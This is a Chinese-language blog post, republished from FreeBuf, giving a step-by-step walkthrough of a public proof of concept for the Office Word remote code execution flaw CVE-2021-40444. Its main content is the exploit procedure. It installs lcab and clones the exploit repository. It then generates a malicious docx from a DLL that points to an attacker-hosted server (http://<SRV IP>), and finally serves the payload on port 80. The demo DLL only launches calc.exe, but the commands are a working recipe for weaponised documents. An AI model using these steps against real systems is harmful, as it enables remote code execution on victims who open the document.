前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >漏洞利用:如何利用Office Word远程代码执行漏洞CVE-2021-40444

漏洞利用:如何利用Office Word远程代码执行漏洞CVE-2021-40444

作者头像
FB客服
发布2021-10-11 16:02:07
1.2K0
发布2021-10-11 16:02:07
举报
文章被收录于专栏:FreeBufFreeBuf

技术介绍

在本文中,我们将给大家提供一个针对微软Office Word远程代码执行漏洞CVE-2021-40444的PoC。这个PoC中,我们会使用一个恶意docx生成器,并成功利用CVE-2021-40444,即微软Office Word远程代码执行漏洞。

这个PoC脚本主要基于研究人员针对在野样本的逆向工程分析结果而创建,参考的docx文件样本为:

代码语言:javascript
复制
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52

漏洞利用前提

首先,我们需要安装好lcab:

代码语言:javascript
复制
sudo apt-get install lcab

如果生成的cab无法使用的话,请尝试将exploit.html URL指向calc.cab。

漏洞利用

首先,我们需要使用下列命令将漏洞利用PoC代码包下载至本地:

代码语言:javascript
复制
git clone https://github.com/lockedbyte/CVE-2021-40444.git

接下来,我们需要根据给定的DLL生成一份恶意docx文档,此时可以使用PoC项目目录中的“test/calc.dll”文件,该DLL将会通过调用system()来执行calc.exe:

代码语言:javascript
复制
python3 exploit.py generate test/calc.dll http://<SRV IP>

拿到了生成好的恶意docx文档(存储在out/目录中)之后,我们就可以配置并启动服务器了:

代码语言:javascript
复制
sudo python3 exploit.py host 80

最后,我们可以在一台Windows虚拟机中测试PoC和生成的恶意docx文档:

PoC项目库

PoC:

https://github.com/lockedbyte/CVE-2021-40444

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-10-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 技术介绍
  • 漏洞利用前提
  • 漏洞利用
  • PoC项目库
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档